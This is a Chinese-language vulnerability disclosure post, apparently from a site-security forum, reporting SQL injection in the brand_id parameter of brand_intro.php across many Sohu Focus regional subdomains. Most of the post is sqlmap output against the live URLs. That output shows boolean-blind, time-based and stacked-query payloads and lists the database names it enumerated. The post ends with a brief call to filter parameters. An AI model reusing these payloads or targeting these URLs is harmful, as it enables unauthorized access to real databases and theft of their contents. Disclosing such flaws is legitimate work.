搜狐焦点某影响所有分站的注入漏洞 - 网站安全

具体参数是：brand_intro.php google一下发现 gz.focus.cn/vote/brand_intro.php?brand_id=46

house.focus.cn/vote/brand_intro.php?brand_id=67 dl.focus.cn/vote/brand_intro.php?brand_id= house.focus.cn/vote/brand_intro.php?brand_id=3 bjmsg.focus.cn/vote/brand_intro.php?brand_id= hz.focus.cn/vote/brand_intro.php?brand_id=19 qhd.focus.cn/vote/brand_intro.php?brand_id= sh.focus.cn/vote/brand_intro.php?brand_id=50 dg.focus.cn/vote/brand_intro.php?brand_id=97 office.focus.cn/vote/brand_intro.php?brand_id= gz.focus.cn/vote/brand_intro.php?brand_id=46 [14:42:49] [INFO] fetched random HTTP User-Agent header from file 'C:\Users\ZX\S qlmap\txt\user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9. 2.3) Gecko/20121221 Firefox/3.6.8 [14:42:50] [INFO] resuming back-end DBMS 'mysql' [14:42:50] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: brand_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand_id=34' AND 4309=4309 AND 'hKAW'='hKAW Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: brand_id=34' AND SLEEP(5) AND 'iACN'='iACN --- [14:42:51] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5.0.11 [14:42:51] [INFO] fetching current database [14:42:51] [INFO] resumed: hjuhe current database: 'hjuhe' [14:42:51] [INFO] fetching database names [14:42:51] [INFO] fetching number of databases [14:42:51] [INFO] resumed: 7 [14:42:51] [INFO] resumed: information_schema [14:42:51] [INFO] resumed: cirea [14:42:51] [INFO] resumed: house [14:42:51] [INFO] resumed: mysql [14:42:51] [INFO] resumed: mysql_identity [14:42:51] [INFO] resumed: realestatehouse [14:42:51] [INFO] resumed: sohuhouse available databases [7]: [*] cirea [*] house [*] information_schema [*] mysql [*] mysql_identity [*] realestatehouse [*] sohuhouse -------------------------------------------------------------- http://dg.focus.cn/vote/brand_intro.php?brand_id=34   sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: brand_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand_id=34' AND 9132=9132 AND 'Nzqf'='Nzqf --- [14:43:41] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL 5 [14:43:41] [INFO] fetching current database [14:43:41] [INFO] resumed: house current database: 'house'

sh.focus.cn/vote/brand_intro.php?brand_id=50

sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: brand_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand_id=50' AND 4282=4282 AND 'XOcu'='XOcu Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: brand_id=50'; SELECT SLEEP(5)-- --- [14:47:39] [INFO] testing MySQL [14:47:39] [INFO] confirming MySQL [14:47:39] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.0 [14:47:39] [INFO] fetching current database [14:47:39] [INFO] resumed: house current database: 'house' [14:47:39] [INFO] fetching database names [14:47:39] [INFO] fetching number of databases [14:47:39] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [14:47:39] [INFO] retrieved: sqlmap got a 302 redirect to 'http://www.focus.cn'. Do you want to follow? [Y/n] n [14:47:41] [WARNING] time-based comparison requires larger statistical model, pl ease wait........................... [14:48:17] [WARNING] it is very important not to stress the network adapter duri ng usage of time-based payloads to prevent potential errors [14:48:17] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex' [14:48:17] [ERROR] unable to retrieve the number of databases [14:48:17] [INFO] falling back to current database [14:48:17] [INFO] fetching current database available databases [1]: [*] house qhd.focus.cn/vote/brand_intro.php?brand_id=   Place: GET Parameter: brand_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand_id=14' AND 1931=1931 AND 'fYke'='fYke Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: brand_id=14'; SELECT SLEEP(5)-- --- [14:53:12] [INFO] testing MySQL [14:53:12] [INFO] confirming MySQL [14:53:12] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.0 [14:53:12] [INFO] fetching current database [14:53:12] [INFO] resumed: ?luqe current database: '?luqe'

漏洞修补方案： 赶紧过滤危险参数，圈内消息已经被黑帽 黑客 盯上了，而且是国外的

 

查看更多关于搜狐焦点某影响所有分站的注入漏洞 - 网站安全的详细内容...